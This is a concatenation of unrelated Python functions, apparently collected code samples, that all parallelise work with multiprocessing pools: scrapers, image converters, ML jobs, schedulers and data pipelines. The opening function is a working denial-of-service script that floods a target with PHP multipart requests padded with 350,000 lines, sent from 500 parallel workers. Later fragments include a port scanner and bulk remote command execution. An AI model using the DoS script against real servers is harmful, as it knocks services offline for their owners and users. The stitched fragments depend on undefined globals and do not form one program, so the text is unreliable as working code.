def main():
    parser = OptionParser()
    parser.add_option("-t", "--target", action="store", dest="target",
                      default=False, type="string", help="test target")
    (options, args) = parser.parse_args()
    target = options.target
    Num = 350000
    headers = {'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',
               'Accept-Encoding': 'gzip, deflate',
               'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}
    body = "------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition: form-data; name=\"file\"; filename=sp.jpg"
    payload = ""
    for i in range(0, Num):
        payload = payload + "a\n"
    body = body + payload
    body = body + "Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------WebKitFormBoundaryX3B7rDMPcQlzmJE1--"
    print "starting..."
    Getting_list()
    pool = Pool(500)
    for ip in IP_Port:
        pool.apply_async(check_php_multipartform_dos, [target, body, headers, ip])
    pool.close()
    pool.join()
def main():
    global output_doc_path
    if output_doc_path == '':
        output_doc_path = os.path.join(os.path.split(input_doc_path)[0], 'outputTinypng')
    if not os.path.exists(output_doc_path):
        os.mkdir(output_doc_path)
    # os.walk returns three values: 1. the parent directory, 2. all directory names (without path), 3. all file names
    for parent, dirnames, filenames in os.walk(input_doc_path):
        for dirname in dirnames:  # directory information
            # print("parent is:" + parent)
            # print("dirname is" + dirname)
            outDir = os.path.join(output_doc_path, os.path.relpath(os.path.join(parent, dirname), input_doc_path))
            if not os.path.exists(outDir):
                os.mkdir(outDir)
        for filename in filenames:  # file information
            # print("parent is:" + parent)
            # print("filename is:" + filename)
            filePaths.append(os.path.join(parent, filename))
    pngFilePaths = filter(lambda x: os.path.splitext(x)[1] == '.png' or os.path.splitext(x)[1] == '.jpg', filePaths)
    print('Parent process %s.' % os.getpid())
    p = Pool(poolLimite)
    for fileName in pngFilePaths:
        p.apply_async(getTinyPng, args=(fileName,))
    print('Waiting for all subprocesses done...')
    p.close()
    p.join()
    print('All subprocesses done.')
def main():
    if MAIL_TO:
        signal.signal(signal.SIGALRM, send_email_by_alarm)
        signal.alarm(TIME_NOTIFICATION_BY_EMAIL)
        send_email_start()
    start_time = int(time.time())
    manager = Manager()
    queue = manager.Queue()
    pool = Pool(PROCESS_NUMBER + 1)
    jobs = []
    pool.apply_async(listener, args=(queue,))
    for config_file in FINAL_CONFIG_TO_SCRAPE:
        job = pool.apply_async(scraper, (config_file, queue))
        jobs.append(job)
    for i, job in enumerate(jobs):
        job.get()
    # Although all jobs have finished, for unknown reasons some providers may still be running.
    time.sleep(10)  # extra time to make sure no provider is still running
    for i in range(1000):
        if len(get_summary().provider_running) > 0:
            time.sleep(500)
        else:
            break
    print "Run all has finished"
    queue.put(LISTENER_KILL_SIGNAL)
    pool.close()
    if MAIL_TO:
        send_email_end()
def _send_requests(self, total_requests, path='', other=False):
    url = 'http://{0}:{1}/{2}'.format(self.traffic_server_host, self.traffic_server_port, path)
    url2 = 'http://{0}:{1}/other/{2}'.format(self.traffic_server_host, self.traffic_server_port, path)
    jobs = []
    jobs2 = []
    pool = Pool(processes=4)
    for _ in xrange(0, total_requests):
        jobs.append(pool.apply_async(requests.get, (url,)))
        if other:
            jobs2.append(pool.apply_async(requests.get, (url2,)))
    results = []
    results2 = []
    for j in jobs:
        try:
            results.append(j.get())
        except Exception as e:
            results.append(e)
    for j in jobs2:
        try:
            results2.append(j.get())
        except Exception as e:
            results2.append(e)
    return results, results2
def getData():
    if os.path.isfile("chat_urls.p"):
        chat_urls = pickle.load(open("chat_urls.p", "rb"))
    else:
        chat_urls = {}
        for user in users:
            chat_urls[user] = get_urls(user)
        teams_url = "http://espn.go.com/mlb/teams"
        pickle.dump(chat_urls, open("chat_urls.p", "wb"))

    # for user in chat_urls:
    #     urls = chat_urls[user]
    #     for url in urls:
    #         getLog(url)

    logDB = {}
    for user in chat_urls:
        logDB[user] = {}
    p = Pool(20)
    i = 0
    manager = Manager()
    db = manager.dict()
    for user in chat_urls:
        for url in chat_urls[user]:
            i += 1
            p.apply_async(addLogData, args=(url, db))
    p.close()
    p.join()
    out = db._getvalue()
    outfile = open("rawChat.txt", "wb")
    for url in out:
        outfile.write(out[url] + "\n")
def multi_remote_exec_cmd(hosts, username, cmd):
    pool = Pool(processes=5)
    for host in hosts:
        username, password, ip, port = get_connect_item(username, host)
        pool.apply_async(remote_exec_cmd, (ip, port, username, password, cmd))
    pool.close()
    pool.join()
def dirImgProcess(path):
    global workerPool, workerOutput, theGreatIndex
    workerPool = Pool()
    workerOutput = []
    work = []
    theGreatIndex = {}
    pagenumber = 0
    for (dirpath, dirnames, filenames) in os.walk(path):
        for afile in filenames:
            if getImageFileName(afile) is not None:
                pagenumber += 1
                work.append([afile, dirpath, options])
    if GUI:
        GUI.progressBarTick.emit(str(pagenumber))
    if len(work) > 0:
        for i in work:
            workerPool.apply_async(func=fileImgProcess, args=(i,), callback=fileImgProcess_tick)
        workerPool.close()
        workerPool.join()
        if GUI and not GUI.conversionAlive:
            rmtree(os.path.join(path, '..', '..'), True)
            raise UserWarning("Conversion interrupted.")
        if len(workerOutput) > 0:
            rmtree(os.path.join(path, '..', '..'), True)
            raise RuntimeError("One of workers crashed. Cause: " + workerOutput[0])
    else:
        rmtree(os.path.join(path, '..', '..'), True)
        raise UserWarning("Source directory is empty.")
def run_make_submission(settings, targets_and_pipelines, split_ratio):
    pool = Pool(settings.N_jobs)
    for i, (target, pipeline, feature_masks, classifier, classifier_name) in enumerate(targets_and_pipelines):
        for j, feature_mask in enumerate(feature_masks):
            progress_str = 'T=%d/%d M=%d/%d' % (i+1, len(targets_and_pipelines), j+1, len(feature_masks))
            pool.apply_async(make_submission_predictions,
                             [settings, target, pipeline, classifier, classifier_name],
                             {'feature_mask': feature_mask, 'progress_str': progress_str, 'quiet': True})
    pool.close()
    pool.join()

    guesses = ['clip,preictal']
    num_masks = None
    classifier_names = []
    for target, pipeline, feature_masks, classifier, classifier_name in targets_and_pipelines:
        classifier_names.append(classifier_name)
        if num_masks is None:
            num_masks = len(feature_masks)
        else:
            assert num_masks == len(feature_masks)
        test_predictions = []
        for feature_mask in feature_masks:
            data = make_submission_predictions(settings, target, pipeline, classifier, classifier_name,
                                               feature_mask=feature_mask)
            test_predictions.append(data.mean_predictions)
        predictions = np.mean(test_predictions, axis=0)
        guesses += make_csv_for_target_predictions(target, predictions)
    output = '\n'.join(guesses)
    write_submission_file(settings, output, 'ensemble n=%d split_ratio=%s' % (num_masks, split_ratio),
                          None, str(classifier_names), targets_and_pipelines)
def _run(self, source, destination_format, clear_source=False, workers=-1):
    """
    parallel version of the `convert` method
    :param source: (rdf) files to convert (source path)
    :param destination_format: the destination format
    :param clear_source: if set, delete the source files. Default = False
    :return: None
    """
    files = []
    src = os.path.abspath(source)
    if os.path.isdir(src):
        files = [os.path.join(src, f) for f in os.listdir(src) if to_process(f, destination_format)]
    elif os.path.exists(src):
        files = [src]
    self._log.info('to process: {0}'.format(files))
    if clear_source:
        self._log.warn('will remove original files after conversion')

    def job_finished(res):
        print '.',
        sys.stdout.flush()

    num_cpus = cpu_count()
    num_workers = workers if 0 < workers < num_cpus else num_cpus
    pool = Pool(processes=num_workers)
    for src in files:
        dst = dest_file_name(src, destination_format)
        if dst:
            pool.apply_async(convert_file, (src, dst, clear_source), callback=job_finished)
    pool.close()
    pool.join()
def get_fractional_errors(R_star, L_star, P_c, T_c):
    """
    Pass in "guess" conditions.
    Will then calculate inward and outward errors.

    Returns:
        [Data array] dY - over/undershoots (+/-, going outward)
        [dx handled outside this]
    """
    # R_star, L_star, P_c, T_c = x
    P_c_0 = modelparameters.P_c  # core pressure, [dyne cm^-2]
    T_c_0 = modelparameters.T_c  # core temperature, [K]
    R_star_0 = modelparameters.R_star
    L_star_0 = modelparameters.L_star

    print ""
    print "R: " + str(R_star / R_star_0)
    print "L: " + str(L_star / L_star_0)
    print "P: " + str(P_c / P_c_0)
    print "T: " + str(T_c / T_c_0)

    X = modelparameters.X
    Y = modelparameters.Y
    Z = modelparameters.Z
    mu = modelparameters.mu
    params = (X, Y, Z, mu)
    M_star = modelparameters.M_star
    m_fitting_point = modelparameters.m_fitting_point

    pool = Pool(2)
    outward_results = pool.apply_async(integrate.integrate_outwards,
                                       [M_star, m_fitting_point, P_c, T_c, mu, X, Y, Z])
    inward_results = pool.apply_async(integrate.integrate_inwards,
                                      [M_star, m_fitting_point, R_star, L_star, mu, X, Y, Z])
    m_outward, y_outward, infodict_outward = outward_results.get()
    m_inward, y_inward, infodict_inward = inward_results.get()

    dr = y_inward[-1, 0] - y_outward[-1, 0]
    dl = y_inward[-1, 1] - y_outward[-1, 1]
    dP = y_inward[-1, 2] - y_outward[-1, 2]
    dT = y_inward[-1, 3] - y_outward[-1, 3]
    dY = np.array([dr, dl, dP, dT])

    print ''
    print 'fractional errors:'
    print "dR: " + str(dr / y_inward[-1, 0])
    print "dL: " + str(dl / y_inward[-1, 1])
    print "dP: " + str(dP / y_inward[-1, 2])
    print "dT: " + str(dT / y_inward[-1, 3])
    return dY
class MultiProcessScheduler(LocalScheduler):
    def __init__(self, threads):
        LocalScheduler.__init__(self)
        self.threads = threads
        self.tasks = {}
        from multiprocessing import Pool
        self.pool = Pool(self.threads or 2)

    def start(self):
        pass

    def submitTasks(self, tasks):
        def callback(args):
            logger.debug("got answer: %s", args)
            tid, reason, result, update = args
            task = self.tasks.pop(tid)
            self.taskEnded(task, reason, result, update)

        for task in tasks:
            logger.debug("put task async: %s", task)
            self.tasks[task.id] = task
            self.pool.apply_async(run_task_in_process,
                                  [task, self.nextAttempId(), env.environ],
                                  callback=callback)

    def stop(self):
        self.pool.terminate()
        self.pool.join()
        logger.debug("process pool stopped")
def averageSimilarityMatrix(dictOfClassesLocal, dictOfWeightsLocal, title="Cluster similarity matrix", savePlot=False):
    global bar, progressCount, dictOfClasses, dictOfWeights, arguments, distances
    dictOfClasses = dictOfClassesLocal
    dictOfWeights = dictOfWeightsLocal
    print "Computing similarity matrix..."
    bar = progressbar.ProgressBar(maxval=len(dictOfClasses.keys())**2,
                                  widgets=[progressbar.Bar('=', '[', ']'), ' ', progressbar.Percentage()])
    bar.start()
    progressCount = 0

    # Initialise task matrix
    arguments = []
    distances = []
    for i, k in zip(range(len(dictOfClasses.keys())), reversed(sorted(dictOfClasses.keys()))):
        arguments.append([])
        distances.append([])
        for j in sorted(dictOfClasses.keys()):
            arguments[i].append((dictOfClasses[k], dictOfClasses[j], dictOfWeights[k], dictOfWeights[j]))
            distances[i].append([])

    # Distribute tasks
    poo = Pool()
    for i in range(len(dictOfClasses.keys())**2):
        poo.apply_async(interClassDistance, (i,), callback=updateResultMatrix)
    poo.close()
    poo.join()
    bar.finish()
    plot.plotSimilarityMatrix(distances, sorted(dictOfClasses.keys()), title, savePlot)
def get_classify():
    classify = {"type1": "美食", "type2": "休闲娱乐", "type4-sub_type1": "酒店", "type5": "购物",
                "type6": "办卡送礼", "type7": "旅游", "type9": "汽车", "type10": "时尚丽人",
                "type11": "生活服务", "type4-sub_type2": "出行", "type4-sub_type3": "出行"}
    for name in classify:
        total_num_of_page = get_num_of_page('http://www.rong360.com/credit/f-youhui-' + name)
        print classify[name] + ": " + str(total_num_of_page)
        thread_num = 20  # number of processes
        section_size = 50
        section = total_num_of_page / section_size
        if total_num_of_page % section_size > 0:
            section += 1
        for k in range(section):
            begin = k * section_size + 1
            end = begin + section_size - 1
            end = min(end, total_num_of_page)
            print "start to get summary pages from " + str(begin) + " to " + str(end) + \
                  ", each summary page contains 20 detail content pages."
            manager = multiprocessing.Manager()
            queue = manager.Queue()       # a queue storing the index of the next url
            queue.put(begin - 1)          # initialize the url index
            page_queue = manager.Queue()  # a queue storing the collected urls
            # start multiple processes to get urls
            pool = Pool(thread_num)
            for i in range(thread_num):
                pool.apply_async(get_page_url, args=(queue, end, page_queue, '-' + name))
            pool.close()
            pool.join()
            print 'num of total pages: ' + str(page_queue.qsize())
            store_data.insert_column("classify", classify[name], page_queue)
def get_answer(self, question, ques_ans, mode):
    '''
    get the best answer in the database
    param@ question: target question
    param@ ques_ans: list of question-answers in the database, [[pos1,q1,a1],[pos2,q2,a2]]
    param@ mode: a tuple of a similarity algorithm name and threshold, eg: ('TFIDF',0.8)
    return: the answer with the largest similarity >= threshold
    '''
    MODE = ['TFIDF', '']
    if mode[0] not in MODE:  # check if the mode is available
        print('no such mode: %s.' % mode[0])
        return None
    if mode[0] == 'TFIDF':
        pool = Pool(5)  # create a process pool
        manager = multiprocessing.Manager()
        queue = manager.Queue()
        lock = manager.Lock()
        M = len(self.__words)
        for ques in ques_ans:
            pool.apply_async(tfidf, args=(question, ques, M, queue, lock))
        pool.close()
        pool.join()
        # get all elements in the queue, each element is (question, similarity)
        answer = []
        while not queue.empty():
            answer.append(queue.get())
        sorted_ans = sorted(answer, key=lambda x: x[1], reverse=True)
        # keep the answers whose similarity >= threshold
        threshold = mode[1]
        ans = [element[0][2] for element in sorted_ans if element[1] >= threshold]
        return ans[0]
def handle(self, *args, **options):
    pool = Pool(settings.NUM_THREADS)
    conf = settings.TRAINER_CURRENCY_CONFIG['supervised_nn']
    print("Starting V2 run")
    for ticker in conf['ticker']:
        for hidden_layers in conf['hidden_layers']:
            for min_back in conf['min_back']:
                for epochs in conf['epochs']:
                    for granularity in conf['granularity']:
                        for datasetinputs in conf['datasetinputs']:
                            for bias in conf['bias']:
                                for momentum in conf['momentum']:
                                    for learningrate in conf['learningrate']:
                                        for weightdecay in conf['weightdecay']:
                                            for recurrent in conf['recurrent']:
                                                for timedelta_back_in_granularity_increments in \
                                                        conf['timedelta_back_in_granularity_increments']:
                                                    pool.apply_async(do_prediction_test, args=(
                                                        ticker, hidden_layers, min_back, epochs, granularity,
                                                        datasetinputs, learningrate, bias, momentum, recurrent,
                                                        weightdecay, timedelta_back_in_granularity_increments))
    print("All V2 jobs queued")
    pool.close()
    pool.join()
    print("V2 run complete")
def main():
    if len(sys.argv) != 3:
        print 'Usage: {} <file> <save_dir>'.format(sys.argv[0])
        sys.exit(1)
    csv_file, save_dir = sys.argv[1], sys.argv[2]
    frame = pandas.read_csv(csv_file, sep='\t', header=None)
    counters = map(Counter, [frame[i] for i in range(len(frame.columns))])
    pool = Pool()
    for i in range(len(counters)):
        for j in range(len(counters)):
            nr_keys = len(counters[i]) * len(counters[j])
            if len(counters[i]) > 200 or len(counters[j]) > 200 or nr_keys > 200 * 200:
                print 'too many keys columns `{},{}\': {}'.format(i, j, nr_keys)
            else:
                print 'columns `{},{}\' passed'.format(i, j)
                pool.apply_async(do_main, [csv_file, frame, i, j,
                                           os.path.join(save_dir, '{}-{}.png'.format(i, j))])
    pool.close()
    pool.join()
    pool.terminate()
def recursive_download_dir(seed, depth, dir, root):
    if not os.path.exists(root):
        os.mkdir(root)
    f = urllib.urlopen(seed + dir)
    text = f.read()
    parser = CaidaParser()
    parser.feed(text)
    p = Pool(5)
    for e in parser.file:
        for i in range(depth):
            print "--",
        print e
        p.apply_async(download, args=(dir, e, seed + dir + e, root,))
        # download(dir, e, seed+dir+e, root)
    p.close()
    p.join()
    for e in parser.dir:
        for i in range(depth):
            print "--",
        print e
        if not os.path.exists(root + dir + e):
            os.mkdir(root + dir + e)
        recursive_download_dir(seed, depth + 1, dir + e, root)
def main():
    # fileNames = [x for x in os.listdir(input_doc_path) if os.path.splitext(x)[1]=='.png']
    # absFileNames = list(map(absFilePath, fileNames))
    os.system('input doc path "%s"' % input_doc_path)
    absFilesPath(input_doc_path)
    # print('****** %s ' % absFileNames)
    global output_doc_path
    if output_doc_path == '':
        output_doc_path = os.path.join(input_doc_path, 'tinypng')
    # if not os.path.exists(output_doc_path):
    #     os.mkdir(output_doc_path)
    # print(input_doc_path)
    # print(absFileNames)
    print('Parent process %s.' % os.getpid())
    p = Pool(poolLimite)
    for fileName in absFileNames:
        p.apply_async(getTinyPng, args=(fileName,))
    print('Waiting for all subprocesses done...')
    p.close()
    p.join()
    print('All subprocesses done.')
def _generate(self, **kwargs):
    uni_key = 'University'
    uni_ext = '.nt'
    get_uni_id = lambda uni_file: int(uni_file.replace(uni_key, '').replace(uni_ext, '').strip())
    universities_rdf = {
        get_uni_id(f): os.path.join(self.output_path, f)
        for f in os.listdir(self.output_path) if f.startswith(uni_key)
    }
    pool = Pool(processes=self.num_workers)
    for uni_id, uni_rdf in universities_rdf.iteritems():
        pool.apply_async(self.distributor(uni_id, uni_rdf),
                         kwds=self._distributor_kwargs(uni_id, uni_rdf))
    pool.close()
    pool.join()

    # concat files
    site_files = lambda site_id: re.findall(r'site_{0}_uni_[0-9]+\.nt'.format(site_id),
                                            ' '.join(os.listdir(self._output_path)))
    for site in xrange(self.num_sites):
        site_parts = site_files(site)
        logger.info('[site = %s] site file parts = %s', site, site_parts)
        with io.open(self.site_path(site), 'w+') as SITE:
            for spart in site_parts:
                spart_file = os.path.join(self._output_path, spart)
                with io.open(spart_file, 'r+') as SPART:
                    SITE.write(SPART.read())
                sh.rm(spart_file)
def run_bam(self):
    anno = self.anno
    #pdb.set_trace()
    if os.path.exists(self.out_path + "/" + self.sample.split(".bam")[0]):
        print "File exists. Skipping..."
        return
    print self.sample
    chrs_tbp = os.listdir(anno)
    tmp_path = tempfile.mkdtemp(suffix=os.path.basename(anno))
    pool = Pool(processes=6)
    #bam = pysam.Samfile(self.sample, 'rb')
    for chr_tbp in chrs_tbp:
        #print chr_tbp
        #self.tab_bam(anno, self.sample, chr_tbp, tmp_path, self.fun, exp)
        #pool.apply_async(tab_bam, (anno, self.sample, chr_tbp, tmp_path, self.fun, exp))
        pool.apply_async(tab_bam, (self, chr_tbp, tmp_path))
        #tab_bam(self, chr_tbp, tmp_path)
    pool.close()
    pool.join()
    #pdb.set_trace()
    if self.flank == 0:
        self.file_combine(tmp_path, os.path.basename(self.sample).split(".bam")[0])
    else:
        self.file_combine(tmp_path, os.path.basename(self.sample).split(".bam")[0] + "_flank" + str(self.flank))
def loop(self, argv=sys.argv):
    # Parse arguments
    self.parse(argv)
    # Check for help option
    if self.isParameter('info'):
        self.info()
        return
    # Call start function
    self.start()
    # Number of processors
    nproc = int(self.getParameter('nproc', '1'))
    # Run with multiprocessing if requested
    if nproc > 1:
        # Create the log directory if needed
        if not os.path.exists('%s/logs' % Common.NeatDirectory):
            os.makedirs('%s/logs' % Common.NeatDirectory)
        # Create a pool of workers
        pool = Pool(processes=nproc)
        try:
            # Loop over the channels
            for set in self.__loopsets:
                pool.apply_async(self.wrapper, (set,))
                time.sleep(1)
            pool.close()
            pool.join()
        except KeyboardInterrupt:
            pool.terminate()
            pool.join()
    else:
        # Run the processes sequentially, without multiprocessing
        for set in self.__loopsets:
            self.process(set)
    # Call end function
    self.end()
def pollswitches(switch_ips):
    """poll switch."""
    poll_switch_ips = []
    with database.session():
        poll_switch_ips = util.update_switch_ips(switch_ips)

    if flags.OPTIONS.async:
        for poll_switch_ip in poll_switch_ips:
            celery.send_task('compass.tasks.pollswitch', (poll_switch_ip,))
    else:
        try:
            pool = Pool(processes=int(flags.OPTIONS.thread_pool_size))
            for poll_switch_ip in poll_switch_ips:
                pool.apply_async(poll_switch.poll_switch, (poll_switch_ip,))
            pool.close()
            pool.join()
        except Exception as error:
            logging.error('failed to poll switches %s', poll_switch_ips)
            logging.exception(error)
class MultiProcessScheduler(LocalScheduler):
    def __init__(self, threads):
        LocalScheduler.__init__(self)
        self.threads = threads
        self.tasks = {}
        from multiprocessing import Pool
        self.pool = Pool(self.threads or 2)

    def start(self):
        pass

    def submitTasks(self, tasks):
        total, self.finished = len(tasks), 0

        def callback(args):
            logger.debug("got answer: %s", args)
            tid, reason, result, update = args
            task = self.tasks.pop(tid)
            self.finished += 1
            logger.info("Task %s finished (%d/%d) \x1b[1A", tid, self.finished, total)
            if self.finished == total:
                logger.info("\r" + " " * 80 + "\x1b[1A")  # erase the progress bar
            self.taskEnded(task, reason, result, update)

        for task in tasks:
            logger.debug("put task async: %s", task)
            self.tasks[task.id] = task
            self.pool.apply_async(run_task_in_process,
                                  [task, self.nextAttempId(), env.environ],
                                  callback=callback)

    def stop(self):
        self.pool.terminate()
        self.pool.join()
        logger.debug("process pool stopped")
def evaluate_fitness(individuals, grammar, fitness, ave, mats, generation, MATERIALS_FILE, LOAD,
                     FITNESSES, DEBUG=False, MULTI_CORE=True, PRINT=False):
    """Perform the mapping and evaluate each individual across multiple available cores"""
    if MULTI_CORE:
        cores = cpu_count()  # use all available cores
        pool = Pool(processes=cores)
        for name, ind in enumerate(individuals):
            bind = (name, fitness, ind, grammar, ave, mats, generation, LOAD, MATERIALS_FILE,
                    FITNESSES, DEBUG, PRINT)
            # Perform the mapping for each individual
            pool.apply_async(parallelize_indivs, args=(bind,), callback=ind.save_result)
        pool.close()
        pool.join()
    else:
        for name, ind in enumerate(individuals):
            bind = (name, fitness, ind, grammar, ave, mats, generation, LOAD, MATERIALS_FILE,
                    FITNESSES, DEBUG, PRINT)
            parallelize_indivs(bind)
    counter = 0
    pounder = 0
    for ind in individuals:
        if ind.phenotype == None:
            bind = (1, fitness, ind, grammar, ave, mats, generation, LOAD, MATERIALS_FILE,
                    FITNESSES, DEBUG, PRINT)
            parallelize_indivs(bind)
            if ind.phenotype == None:
                counter += 1
            if ind.good == True:
                pounder += 1
    if counter:
        print "Number of individuals with no phenotype:", counter
def main():
    search_dir = sys.argv[1]
    assert(os.path.isdir(search_dir))
    files_to_convert = []
    for directory_root, directory, filenames in os.walk(search_dir):
        for filename in filenames:
            full_filename = os.path.join(directory_root, filename)
            if full_filename.endswith('.entities.gz'):
                files_to_convert.append(full_filename)
            if full_filename.endswith('.generations.gz'):
                files_to_convert.append(full_filename)
    print 'Found %d files to convert' % len(files_to_convert)
    r = library.Reporter('converting files')
    r.set_total_count(len(files_to_convert))
    pool = Pool()
    for f in files_to_convert:
        pool.apply_async(convert_file, args=(f,), callback=r.increment_report_callback)
    pool.close()
    pool.join()
    r.done()
def test():
    pool = Pool(len(ip_list))
    for ip in ip_list:
        pool.apply_async(start_collect, (ip, '/letv/crawler_delta', './test_in'))
    print 'waiting for all file collectors to finish...'
    pool.close()
    pool.join()
def test_run(force=False):
    if not args.test_run and not force:
        return

    if not os.path.exists(dir_test):
        os.mkdir(dir_test)

    number_device = len(devices)
    if number_device < 1:
        error('Please ensure test device is connected')

    # Build test
    if args.test_drybuild:
        results = {}
        for command in test_suite:
            results[command] = []
            for suite in test_suite[command]:
                results[command].append('PASS')
    else:
        results = test_build(force=True)

    pool = Pool(processes=number_device)
    for index, device in enumerate(devices):
        pool.apply_async(_test_run_device, (index, results))
    pool.close()
    pool.join()
def run(wait=0):
    """Starts the scraping process.

    Creates a process per week per year given in pages.
    """
    logger = makeLogger('main', r'./logs_RotoFDStats/')
    startTime = datetime.now()
    logger.debug('start time: ' + str(startTime))
    logger.debug('waiting %d seconds', wait)
    time.sleep(wait)
    logger.debug('starting')
    pool = Pool(processes=int(get_proxy_count()/2))
    pages = [(2011, 17), (2012, 17), (2013, 17), (2014, 17), (2015, 17)]
    for year, maxWeek in pages:
        for week in range(1, maxWeek+1):
            #parseWeek(year, week)
            pool.apply_async(parseWeek, (year, week,))
    pool.close()  # Prevents any more tasks from being submitted to the pool. Once all the tasks have been completed the worker processes will exit.
    pool.join()   # Wait for the worker processes to exit. One must call close() or terminate() before using join().
    logger.debug('run time: ' + str(datetime.now()-startTime))
    closeLogger('main')
def runPortScan(self, ips, threads, allports=''):
    results = []
    rep = re.match(r'(\w+)-(\w+)', allports)
    if rep:
        left = int(rep.group(1))
        right = int(rep.group(2)) + 1
        ports = xrange(left, right)
    else:
        if allports == '':
            allports = self.default_port
        ports = allports.replace(' ', '').split(',')
    for ip in ips:
        pool = Pool(threads)
        for port in ports:
            pool.apply_async(func=self.simpleScan, args=(ip, str(port)), callback=self.callback)
        pool.close()
        pool.join()
        # print ''
        ipport = {}
        ipport['ip'] = ip
        ipport['port'] = self.openport
        results.append(ipport)
        self.openport = ''
        self.first = 0
    return results
def main(num):
    """ main function """
    with open('./log/getynpic.log', 'wb+') as logfile:
        logfile.truncate()
    with open('./log/ynfailedurl.log', 'wb+') as logfile:
        logfile.truncate()
    otherpattern = re.compile(r'\n|\s', re.S)
    njfile = open('./ynalltiles', 'r')
    alllines = njfile.readlines()
    everyline = len(alllines)/num + 1
    p = Pool(processes=num)
    for num in xrange(0, num):
        partlines = alllines[num*everyline:(num+1)*everyline]
        p.apply_async(oneprocess, args=(partlines,))
    p.close()
    p.join()
    njfile.close()
    with open('./log/getynpic.log', 'r') as logfile:
        for oneline in logfile.readlines():
            oneinfo = re.sub(otherpattern, '', oneline)
            if oneinfo != '':
                infolist = oneinfo.split(',')
                getimage(infolist[0], infolist[1])
    with open('./log/ynfailedurl.log', 'r') as logfile:
        for oneline in logfile.readlines():
            lineinfo = re.sub(otherpattern, '', oneline)
            if lineinfo != '':
                gotourl(lineinfo)
def make_lmdb_from_imgs(data_path,
                        lmdb_path,
                        img_path_list,
                        keys,
                        batch=5000,
                        compress_level=1,
                        multiprocessing_read=False,
                        n_thread=40,
                        map_size=None):
    """Make lmdb from images.

    Contents of lmdb. The file structure is:

    example.lmdb
    ├── data.mdb
    ├── lock.mdb
    ├── meta_info.txt

    The data.mdb and lock.mdb are standard lmdb files and you can refer to
    https://lmdb.readthedocs.io/en/release/ for more details.

    The meta_info.txt is a specified txt file to record the meta information
    of our datasets. It will be automatically created when preparing datasets
    by our provided dataset tools. Each line in the txt file records
    1)image name (with extension), 2)image shape, and 3)compression level,
    separated by a white space.

    For example, the meta information could be:
    `000_00000000.png (720,1280,3) 1`, which means:
    1) image name (with extension): 000_00000000.png;
    2) image shape: (720,1280,3);
    3) compression level: 1

    We use the image name without extension as the lmdb key.

    If `multiprocessing_read` is True, it will read all the images to memory
    using multiprocessing. Thus, your server needs to have enough memory.

    Args:
        data_path (str): Data path for reading images.
        lmdb_path (str): Lmdb save path.
        img_path_list (str): Image path list.
        keys (str): Used for lmdb keys.
        batch (int): After processing batch images, lmdb commits.
            Default: 5000.
        compress_level (int): Compress level when encoding images. Default: 1.
        multiprocessing_read (bool): Whether use multiprocessing to read all
            the images to memory. Default: False.
        n_thread (int): For multiprocessing.
        map_size (int | None): Map size for lmdb env. If None, use the
            estimated size from images. Default: None
    """
    assert len(img_path_list) == len(keys), (
        'img_path_list and keys should have the same length, '
        f'but got {len(img_path_list)} and {len(keys)}')
    print(f'Create lmdb for {data_path}, save to {lmdb_path}...')
    print(f'Total images: {len(img_path_list)}')
    if not lmdb_path.endswith('.lmdb'):
        raise ValueError("lmdb_path must end with '.lmdb'.")
    if osp.exists(lmdb_path):
        print(f'Folder {lmdb_path} already exists. Exit.')
        sys.exit(1)

    if multiprocessing_read:
        # read all the images to memory (multiprocessing)
        dataset = {}  # use dict to keep the order for multiprocessing
        shapes = {}
        print(f'Read images with multiprocessing, #thread: {n_thread} ...')
        pbar = tqdm(total=len(img_path_list), unit='image')

        def callback(arg):
            """get the image data and update pbar."""
            key, dataset[key], shapes[key] = arg
            pbar.update(1)
            pbar.set_description(f'Read {key}')

        pool = Pool(n_thread)
        for path, key in zip(img_path_list, keys):
            pool.apply_async(read_img_worker,
                             args=(osp.join(data_path, path), key, compress_level),
                             callback=callback)
        pool.close()
        pool.join()
        pbar.close()
        print(f'Finish reading {len(img_path_list)} images.')

    # create lmdb environment
    if map_size is None:
        # obtain data size for one image
        img = cv2.imread(osp.join(data_path, img_path_list[0]), cv2.IMREAD_UNCHANGED)
        _, img_byte = cv2.imencode('.png', img, [cv2.IMWRITE_PNG_COMPRESSION, compress_level])
        data_size_per_img = img_byte.nbytes
        print('Data size per image is: ', data_size_per_img)
        data_size = data_size_per_img * len(img_path_list)
        map_size = data_size * 10

    env = lmdb.open(lmdb_path, map_size=map_size)

    # write data to lmdb
    pbar = tqdm(total=len(img_path_list), unit='chunk')
    txn = env.begin(write=True)
    txt_file = open(osp.join(lmdb_path, 'meta_info.txt'), 'w')
    for idx, (path, key) in enumerate(zip(img_path_list, keys)):
        pbar.update(1)
        pbar.set_description(f'Write {key}')
        key_byte = key.encode('ascii')
        if multiprocessing_read:
            img_byte = dataset[key]
            h, w, c = shapes[key]
        else:
            _, img_byte, img_shape = read_img_worker(osp.join(data_path, path), key, compress_level)
            h, w, c = img_shape
        txn.put(key_byte, img_byte)
        # write meta information
        txt_file.write(f'{key}.png ({h},{w},{c}) {compress_level}\n')
        if idx % batch == 0:
            txn.commit()
            txn = env.begin(write=True)
    pbar.close()
    txn.commit()
    env.close()
    txt_file.close()
    print('\nFinish writing lmdb.')
def connection_cache(connection):
    logger.write("Processing {0} -> {1} @ {2}".format(connection["start"], connection["end"], connection["starttime"]))
    connectiondb = ConnectionPrices(db, connection["id"], r)
    connectiondb.getAggregatedData()  # we don't need the result, but the call refreshes the cache

# track cache function
def track_cache(track):
    logger.write("Processing {0} -> {1}".format(track["start"], track["end"]))
    trackdb = TrackPrices(db, track, r)
    trackdb.getAggregatedData()  # we don't need the result, but the call refreshes the cache

while True:
    # Pool worker
    pool = Pool(4)
    # cache connections
    for connection in db.table('bahn_monitoring_connections').where('active', '1').get():
        pool.apply_async(connection_cache, (connection,))
    # cache tracks
    for track in db.table('bahn_monitoring_connections').where('active', '1').distinct().get():
        pool.apply_async(track_cache, (track,))
    pool.close()
    pool.join()
